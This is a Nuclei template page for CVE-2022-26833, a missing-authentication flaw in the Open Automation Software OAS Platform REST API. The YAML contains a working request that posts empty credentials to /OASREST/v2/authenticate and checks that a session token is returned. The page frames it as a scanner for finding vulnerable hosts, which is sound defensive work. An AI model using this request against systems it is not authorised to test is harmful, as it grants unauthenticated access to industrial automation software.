Skip to content
Nuclei Templates

Open Automation Software OAS Platform V16.00.0121 - Missing Authentication

ID: CVE-2022-26833

Severity: critical

Author: true13

Tags: cve2022,cve,oas,oss,unauth,openautomationsoftware

Description

Section titled “Description”

An improper authentication vulnerability exists in the REST API functionality of Open Automation Software OAS Platform V16.00.0121. A specially-crafted series of HTTP requests can lead to unauthenticated use of the REST API. An attacker can send a series of HTTP requests to trigger this vulnerability.

YAML Source

Section titled “YAML Source”
id: CVE-2022-26833


info:
  name: Open Automation Software OAS Platform V16.00.0121 - Missing Authentication
  author: true13
  severity: critical
  description: |
    An improper authentication vulnerability exists in the REST API functionality of Open Automation Software OAS Platform V16.00.0121. A specially-crafted series of HTTP requests can lead to unauthenticated use of the REST API. An attacker can send a series of HTTP requests to trigger this vulnerability.
  impact: |
    An attacker can exploit this vulnerability to gain unauthorized access to the affected system.
  remediation: |
    Apply the latest security patch or update to the Open Automation Software OAS Platform V16.00.0121 to fix the missing authentication issue.
  reference:
    - https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1513
    - https://nvd.nist.gov/vuln/detail/CVE-2022-26833
    - https://talosintelligence.com/vulnerability_reports/TALOS-2022-1513
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:H
    cvss-score: 9.4
    cve-id: CVE-2022-26833
    cwe-id: CWE-306
    epss-score: 0.0166
    epss-percentile: 0.8759
    cpe: cpe:2.3:a:openautomationsoftware:oas_platform:16.00.0112:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: openautomationsoftware
    product: oas_platform
  tags: cve2022,cve,oas,oss,unauth,openautomationsoftware


http:
  - raw:
      - |
        POST /OASREST/v2/authenticate HTTP/1.1
        Host: {{Hostname}}
        Accept-Encoding: gzip, deflate
        Accept: */*
        Connection: keep-alive
        Content-Type: application/json


        {"username": "", "password": ""}


    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"status":'
          - '"data":'
          - '"token":'
          - '"clientid":'
        condition: and


      - type: word
        part: header
        words:
          - "application/json"


      - type: status
        status:
          - 200
# digest: 4b0a00483046022100b78db49d26ef1f141c753570f9da99de907c6a8a2b2fc3ab1045d729c76dad7d022100fe16bf4487690566c3e388a0064ec5339d65184c3cad9882edcc1db1c4ed0af4:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-26833.yaml"

View on Github